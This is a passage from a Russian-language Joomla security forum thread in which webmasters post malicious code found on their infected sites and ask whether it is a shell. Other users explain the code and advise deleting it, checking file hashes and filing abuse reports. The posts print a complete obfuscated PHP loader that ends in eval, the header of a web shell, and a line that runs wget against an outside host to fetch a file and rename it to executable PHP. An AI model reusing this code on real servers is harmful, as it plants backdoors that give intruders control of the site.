Вирус на сайте, редирект, что делать как лечить! - страница 10 - Безопасность сайтов на Joomla

Здравствуйте! Случилась бяка - заражены все сайты (Joomla 1.5 + виртуемарт) на хостинге. Причина точно неизвестна, но скорее всего это отголоски серии прежних заражений месяц назад.

Сначала в index.php был внедрен код eval(base64_decode('aGVhZGVyK..........')); . Код был удален. Был сменен пароль на ftp. Больше ничего не проводилось.

Затем, через несколько дней, через JCE был залит файл COPYRIGHT.php с вредоносным кодом. Файл был удален, редактор JCE на всех сайтах снесли.


Сейчас, на всех сайтах заразились js файлы. В каждом файле, в конце кода прописана строка: ;document.write(unescape("%3C%73%63%72%69%70%74%.............."));

Антивирусники обнаружили такую заразу на всех сайтах:

ShellCode.T
Trojan-Downloader.JS.JScript.cb
TrojWare.JS.Agent.TC
JS.Redirector.189
Trojan.JS.Redirector

При сохранении бэкапов на компе и сканировании, Касперский находит строчки JS.Redirector.189 в js-файлах и удаляет ее. Больше ничего не показывает. Хотя, при онлайн проверке указывает на Trojan-Downloader.JS.JScript.cb

Все зараженные js-файлы изменены в один день, в прошлом месяце. Логи за этот период не сохранились ((

Подскажите, пожалуйста, где искать заразу, которая все это заливает?
Допустим, строчку зловредного кода я удалю через эти скрипты - (http://joomlaforum.ru/index.php/topic,198048.0.html) или (http://secu.ru/scripts/find-and-replace) или Касперским. А где искать сам Shell?

Папки tmp всех сайтов пустые. Файлы index.php вроде чистые.
Помогите, плз!

Здравствцуйте, на сайт постоянно заливается вредоносной код редиректа. То в php вида eval, то в .httacsecc. Это уже порядком надоело, удалил все модули. Проверил айболитом, остался последний подозрительный код
в файле mod_articles.php
Это шел или нужный код?
И еще один

Код

<?php
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

в файле mod_articles.php
Это шел или нужный код?

Это шелл, удалить

И еще один

Код

<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(](:(,+_(-+_(--_(`(.(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^(`(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-(`(:(.(,(.(.+_(-(.+`(,-_(.(`(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,(`(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+`(`,&(:+{(.-^(_-_(`-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(`)](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^(`(`(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|(`(`(.(.+_(--^(,(.(:+{+_(-+`(`+_(-(:(`(:-_(,,&(,-_(.+{(,+_(-(:)](`+_(-(.+{(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(`)](^-_(_(:(^+`(_+`(`+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+`(:+|(,)](:({(]+`(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:(`(]+`(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+`(,+`(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+`(:(](.(,(]-^+_(-(`(,({(`(^(`(^(.+`(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:(`(.+_(-(,(:(.(,+_(--^(:)](`-^(]+|(:(_(^-^+_(-(`(,(`(:-^(,(_(,-_(.+{(,-_(.)](`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:(_+_(-+`(:(_(,(](_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+`(:(_(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+`(](_+_(-(`(,(^(`(^(`(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-(`(](:(`(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+`(^(:(,+`(,(.(.+_(-(.,&+_(-)](`+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+`(:+|(,(_(,-_(.+{(,-_(.)](`+_(-(](`(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+`(,-^(,(:(:(:(.+`(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+`(,-^(,(:(:(:(.+`(:(^(.(,(,(.(.-_(:+`(,(`+_(-+`(^(:(,+`(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+`(](_+_(-(`(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+`(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:(`+_(-({+_(-+`(^(:(,+`(,-^(:+_(-(`(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-(`+_(-(:(:(`(:+`(^(,(`(:(,(](.(^(`(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+`(.+{(.(,(,+`(.+|(^+`+_(-(:(,)](:-^(:+|(],&(`+`(^+_(-(:(`(^+|(](](_+`(^(^+_(-+`(,-^(:+_(-(:(.(]+`(:+`(,+|(_+`(.+_(-(,-^(_(^(^(^+_(-(:(,(^(`(.(:+`(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`(](](_(,+`(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:(`(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^(`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+`(.)](^+`(^(^(](`+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-(`+_(-(:(:+{(.+`+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+`(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_(`-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+`+_(-(`(.,&(^(`(,+_(-(:(](:+{(:(`(,(:(,+|(,,&(.-_(.(.(:(](.(](^+`+_(--^(](.(`+{(_(.(_(,(:+`(,+|(_(.(`(`(,({(.(](^({(.,&(,({(:,&(:(`(,+|(:+`(,,&(_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:(`(.,&(]+`(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+`(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^(`(.(.+_(-(:(^(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,+_(-+_(-(:+`(,+|(_(.(:-^(,+`(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,(`+_(-)](:+|(`+_(-(.+`(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,(](:(_({+_(-(`(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_(`+`+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.(`(:(^(.+{(:+`(,(`(_,&+_(--_(])]+_(-)](:(`(.,&+_(--_(.+_(-(,(](_(.(`(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)](`-^(,(_(:+|(,)](.+{(:+`(:(](:(:(^(`+_(--^+_(--^(:(`(`-^(:(`(`+`(^+_(-(:(`(.+{(_+_(-(_+`+_(-)](^(.(,({(:+`(:+|(,)](:({(]+`(:)](:(`(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+`(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`+{(],&(:)](:(`(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&(`+`(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-(`(](:(`(^(:+`(,+{(:,&(]+`(.(](:)]+_(--_(_(^(^(:(,+`(,-^(:+_(-(_(:(]+`(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^(`(.(:({(,)](.(`(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(`,&(`(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-(`(,({(`(.(:+_(-(,-_(:-_+_(-+`(.-_(.(]+_(-({(]-_(^(,(,(`(,(^(:+_(-(.,&(,(:(:+|(,(](_+`(.-^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^(`(_(,(.(,+`(.+_(-(.+`+_(--^(:+{+_(-({(:-_(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+`(]-_(:+_(-(`(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+`(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+`(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.(`(.(,,&(`({(`(_(,(.(,(](.(.(:+|(,(](`+{(]-^(.)](`+`(]+|(:(`+_(-+_(-(^+{(](.(`+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(](`(_+_(-(](,-^(:,&(:-_(](.(`(`(,+|(_(:(`-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)](`-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+`(`(.(,(](`-^(]+{(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,(`(_(:(_(^+_(-(:+`(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_(`-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+`(:(:(,(^(_,&+_(-(.+_(-+_(-(](`(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_(`+{(^(`(,(,+_(-)](:(:(.(,(](.(`(]+_(-+`(.(:(.(_(,-^(_(.+_(-+`(^(^+_(-)](`(^(`(,(](_(_(.(^(`(`(](:(`+_(-)](:(`(^(`(,+{(](:(`(^(.)](,(:(.(:(,-_(_,&(`+`(]+|(:(.+_(-+_(-(^+{(](`(_(,(_(](^(](:(.+_(-({(:({(:(`+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&(`-_(],&(:,&(`+_(-(](.(_+|+_(-+`(^(_(,,&(`+{(`(,(](:(.({(.+`(.+|(:(^(,(`(.+`(](^+_(-(`(](:(`(_(:-_(:+_(-(_(:(:(`(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^(`+`(`({(.+`(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+`(,-_(`(,(](:(.({(]-^(.(^(`({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+`(](.(`(`(,+|+_(-+_(-(_(`(:(_(_+|(,,&(,-_(.+{(:(](:+`(,(_(:+|+_(-)](.-_(`-^(]-_(.(:(_,&(](:(:(_(`+{(_(.(.+`(.(:+_(-({(.(^(:(^(:(](.(_(^+`+_(-,&+_(-({(:(`(`+_(-(]-^(.(:(](:(`+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{(`(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(`)]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](`,&(,(^(_({(.+`(.-_(.-^(,-^(.(_+_(--^(^(_(,({(`-^(`,&(,(^(`+`(^+_(-(.-_(:(^(,(:(.+`+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_(`-^(])]+_(-)](^({(^(,(](`(`(_(:(_(](:(_({+_(-(`(](,(`)](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.(`(]+`(.+|(:(:+_(--_(.(_(^-^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(](`(`(_(.)](](_(`(`+_(-({(_(_(`(.(,(`(_+|(:+|(,)](_+_(-(^+{(:(,(,+|(`+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+`(:(_(,(](_(.(`(.(,+`(_)]+_(-(.(,(.(](.(`+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-)](,+|(:+|+_(-+`(.-_(:({(](:(_+_(-(^+`(^-^(])](.(^(:+{(]({(`+`(](:(](,(^-_(_(.(:-^(:+|(`+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(](`(`(,+_(--^(.-_(,(`(]+`(_({(`({(]-_(:(`+_(-({(^(,(]+{+_(-+`(,,&(:-^(,(:(](^(`+{(`({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_(`+{+_(-+|(:+`(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:(`(_(.+`(](:(`+`(_(,(](:(^-_(_(.(:-^(:+|(`+{(_(.(^+{(^(,(]-^(:+_(-(^(`(,+`(:(,+_(-)](.(,(^(`+_(-(_(](:(`(_(.+`(](_(_+{(^+{(`(:(_(](](.(`-^(:+|(`+{(_(.(^+{(^(,(.+`(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&(`-^(`,&(,({(`+`(^+_(-(](,(^-_(_(.(]+|(]+{(`({(_(.(^+{(^(,(.+`(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&(`+{(_(.(_(,(^+`(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({(`+_(-(^+|(_(.(]+|(]+{(`({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:(`(^+|(](](_+`(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+`(:(:+_(-(:(.(,(^(^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+`(,(:(.+|(`-^(]-_(.(_(,+{(]-_(^(_(`(,(.-^(,(.(:+`(,)](.(.(`(_+_(-({(:(,(](_+_(-(`+_(-)](:(](:+|+_(--^(:(,(,(.(_+`(_(`(^(^(_(^+_(-)]+_(-(_(,-^(.(](`(_(,(](.(_(,(_(.(_(`(_(^)](`+{+_(-(_(^,&(,-_(:(`(.-_(](^(:,&+_(--_(.(_(:+`(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^(`(:(.(^(,+_(-(`(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^(`(_(])](,+`(`,&(.-^(,(^(`(,(_(.(_(,(^+`+_(-(`(](,(^-_(,-^(.)](](^+_(-(`(,(.(:(](`+_(-(.+`(.(,+_(--^(:({(.(^+_(--_(:(`+_(--^(^(_(,({(`-^(`+{+_(-)](.(_+_(-+`(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:(`(,(`(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|(`-^(`,&(,)](`+`(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_(`(`(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_(`(`(,+{+_(-+_(-(_(.(:(_(_+|(,,&(`({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+`(,+`(.+_(-(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+{+_(-(,(.+`(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+`(]-_(:+_(-(`(,(^+_(-(.-^(_(,(](:(:(:(,(`(:(_(^(:+_(-+{(,,&(`+`(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({(`+{(_(.+_(-(`(^)](_(:(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|+_(-)](.(.(:(:(,(`(.)](_)]+_(-(`+_(-(:(:(`(:+`(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+`+_(--^(:(](:(`(.+_(-(,-_(:(,(](.(_-^(:(^(](.(`-^(]+{(`({(_(.(:(`(:(^+_(-)](:(_(,(:(.+|(`-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:(`(:(,(,+|(`+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+`(:(_(,(](_(:(.,&+_(-(:+_(-+`(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(:(,+`(,-^(:+_(-(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,(`(`(,(](`(`(`+_(-(:({(.-_(`+|(.(](,(,+_(-(`(_-_+_(-({(:({(:({+_(-(:(:+|(]+|(`-^(:+|(^(_(,({(_-_(`,&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+`(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.(`+`(`,&(,)](`+`(](:(:+_(-(`(.(,({(`({+_(-(.(.,&(:+{+_(-,&(,+`(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&(`+`+_(-)](,-_(:-^+_(-+`(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](`,&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-(`(^)](,(:(.+|(`-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+`(,)]+_(-(^(.(`+_(--^(.+`(](.+_(-(`+_(-({(,,&(:-^+_(-+`(:(,(](.(_(:(`-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:(`+_(-({(.,&(^(:(,+_(-(](:(`(_(:+`(](:(_({+_(-(`(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)](`-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)`(-(-)^*&,|-(,*(.(*,++^(*,|+`(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+`+`)`(*,|)^-`,+,_-),+-^(*,*({)`*&,),.-((.(.(*,.+^(*,++^(*,|+`+`)_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+`+`(:(:)^-`-`,:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)`(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)`(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(+))^(*+|*-*++*)`(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-`(*,^)`(*+|*)*|*|*^*:*++^(-,^,+-:(-+`)^,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|+&*|+)+*+^(-,^,+-:(-+`)^-`,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|*-*++*+^(-,^,+-:(-+`)^-`,:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-`(*,+,_)`*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)`*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)`(*,+,_(+(*,^,_)^(*,,,_)`(*,+,_(`(*-(,_)^,,,|-((.(*,|)`)&)^(*,|)_(*,,,_)^(*,|(^)`(*,^,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`,:,,(.(*-(,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)`*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`-(,+-*-+-(,{(.(*,*(:)^-`(-(:)^-`(*,*)`*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>

тоже однозначно удоляй!

В продолжение этого сообщения http://joomlaforum.ru/index.php/topic,246899.msg1304896.html#msg1304896

На одном из сайтов на хостинге, в разделе /images/stories/ обнаружил файл dkml.php с текстом:

"iskorpitx <?php system("wget renovanorte.com/ll.txt; mv ll.txt ll.php"); ?>" Это и есть Шелл?

В папку images также добавлен файл .htaccess с текстом:

А в файл .htaccess сайта добавлены строчки:

order deny,allow
#allow from 46.33.226.192
#deny from all

Здравствуйте! Случилась бяка - заражены все сайты (Joomla 1.5 + виртуемарт) на хостинге. Причина точно неизвестна, но скорее всего это отголоски серии прежних заражений месяц назад.

пробовал проверять все файлы Joomla на изменение? при помощи сверки по MD5...
лови ссылку: http://www.jm-experts.com/extensions-tools/joomla-md5-hash-check
качай файлы для своей версии, и проверяй. Учти, что сторонние компоненты (модули и плагины) оно не проверит.
Вероятно где-то есть бэкдор.

Все зараженные js-файлы изменены в один день, в прошлом месяце. Логи за этот период не сохранились ((

Логи Joomla или FTP-Логи хостера?
У хостера должны оставаться FTP-логи всех ip-адресов, которые имели подключение и изменение/запись файлов.
Уточни и хостера и пиши абузу провайдеру данного IP. Для европейских провайдеров может возыметь действие.
ну и прикрой сайты от данного IPшника.

"iskorpitx <?php system("wget renovanorte.com/ll.txt; mv ll.txt ll.php"); ?>" Это и есть Шелл?

Дословно, он закачивает файл .txt и переименовывает его в исполняемый php. На 100% это не файл Joomla.

пробовал проверять все файлы Joomla на изменение? при помощи сверки по MD5...

А для Joomla 2.5.9 есть что-нибудь похожее?

А для Joomla 2.5.9 есть что-нибудь похожее?

http://www.rsjoomla.com/support/documentation/view-knowledgebase/133-changelog.html
RSFirewall имеет, хоть и платный.
но без покупки, можно установить и проверить сайт по MD5 Hash файлов, главное последнюю версию качать.
вот номер последней версии 1.4.0 Rev 47.

Привет! Мучаюсь с периодически возникающей заразой, похожей на вышеописанные случаи. Наковырял в папке com_userprofiles\ интересные файлики:get.php , userprofiles.php

Содержимое первого  такое:

Содержимое второго такое:
Это что, кто понимает? Закодированный кусок того самого шелла?

Да. Если сомневаешься, вставь в начало скрипта определение

Второй кусок кода с preg_replace(...) 100% бэкдор, а не файл Joomla.  
эта команда выполняет преобразование кода написанного при помощи REGular expressions, отсюда и название pREG_replace
используется по аналогии с base_64, чтобы не было понятно, что именно внутри размещён вредоносный код.

Второй кусок кода с preg_replace(...) 100% бэкдор, а не файл Joomla.

Спасибо, други!
Решил поковыряться в логах доступа к сайту. И вот что интересного там отыскал (это, как я понимаю, меня так ломают?)..
Часть 1

Часть вторая (тут похоже подбирают пароли??)

Решил поковыряться в логах доступа к сайту. И вот что интересного там отыскал (это, как я понимаю, меня так ломают?)..

Часть вторая (тут похоже подбирают пароли??)

dormidont абсолютно точно. Какие дальнейшие планы к действиям?

Если кажется, что ничего против этих "деятелей" сделать низя, то это не так ))
Идёшь по этому сайту-утилите:
http://whois.domaintools.com/
Вводишь туда эти 2а ip-адреса атакующих.
находишь там оф. сайт провайдера и присылаешь им свои логи (то, что ты адрес своего сайта затёр перед публикацией логов это правильно, но когда будешь им отправлять адрес своего сайта в них не затирай).
Пишешь официальное письмо провайдеру с "Обузой" (мол с вашей подсети вот такие-то ip-адерса производят вот такие вот атакующие действия на твой сайт). Провайдер обработает обузу и логи (по закону он обязан это сделать), посмотрит действия этих адресов сравнит с логами.
Если совпадёт, то тому чуваку сделают предупреждение согласно законам той страны где размещён хостинг... "с записью в грудную клетку" )))

Это всё может возыметь 4 результата: )))
1) Ничего не произодёт
